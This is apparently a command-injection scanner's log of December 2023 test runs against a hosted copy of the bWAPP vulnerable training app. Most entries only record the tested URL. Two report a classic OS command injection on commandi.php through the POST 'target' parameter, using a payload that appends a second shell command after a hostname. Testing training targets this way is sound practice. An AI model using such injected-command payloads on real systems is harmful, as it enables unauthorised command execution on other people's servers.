
=====================================
| Started in 12/02/2023 at 02:27:52 |
=====================================
[info] Tested URL : https://bwapp.hakhub.net/login.php
=====================================
| Started in 12/02/2023 at 02:28:22 |
=====================================
[info] Tested URL : https://bwapp.hakhub.net/login.php
=====================================
| Started in 12/02/2023 at 02:47:41 |
=====================================
[info] Tested URL : https://bwapp.hakhub.net/login.php
=====================================
| Started in 12/02/2023 at 02:54:23 |
=====================================
[info] Tested URL : https://bwapp.hakhub.net/login.php
=====================================
| Started in 12/02/2023 at 03:54:23 |
=====================================
[info] Tested URL : https://bwapp.hakhub.net/login.php
=====================================
| Started in 12/05/2023 at 21:15:14 |
=====================================
[info] Tested URL : https://bwapp.hakhub.net/unvalidated_redir_fwd_1.php?url=http%3A%2F%2Fwww.linkedin.com%2Fin%2Fmalikmesellem&form=submit
=====================================
| Started in 12/06/2023 at 23:02:01 |
=====================================
[info] Tested URL : https://bwapp.hakhub.net/login.php
=====================================
| Started in 12/06/2023 at 23:04:05 |
=====================================
[info] Tested URL : https://bwapp.hakhub.net/login.php
=====================================
| Started in 12/06/2023 at 23:07:01 |
=====================================
[info] Tested URL : https://bwapp.hakhub.net/login.php
=====================================
| Started in 12/06/2023 at 23:10:49 |
=====================================
[info] Tested URL : https://bwapp.hakhub.net/login.php
=====================================
| Started in 12/06/2023 at 23:12:51 |
=====================================
[info] Tested URL : https://bwapp.hakhub.net/login.php
=====================================
| Started in 12/06/2023 at 23:21:35 |
=====================================
[info] Tested URL : https://bwapp.hakhub.net/login.php
=====================================
| Started in 12/08/2023 at 01:09:24 |
=====================================
[info] Tested URL : https://bwapp.hakhub.net/commandi.php
[info] Type: Results-Based Os Command Injection
[info] Technique: Classic Command Injection Technique
[info] Parameter: (POST) target
[info] Used payload: www.nsa.gov;echo QXVTXM$((76%2B25))$(echo QXVTXM)QXVTXM

=====================================
| Started in 12/10/2023 at 16:36:10 |
=====================================
[info] Tested URL : https://bwapp.hakhub.net/commandi.php
[info] Type: Results-Based Os Command Injection
[info] Technique: Classic Command Injection Technique
[info] Parameter: (POST) target
[info] Used payload: www.nsa.gov;echo QXVTXM$((76%2B25))$(echo QXVTXM)QXVTXM

=====================================
| Started in 12/10/2023 at 16:39:59 |
=====================================
[info] Tested URL : https://bwapp.hakhub.net/commandi_blind.php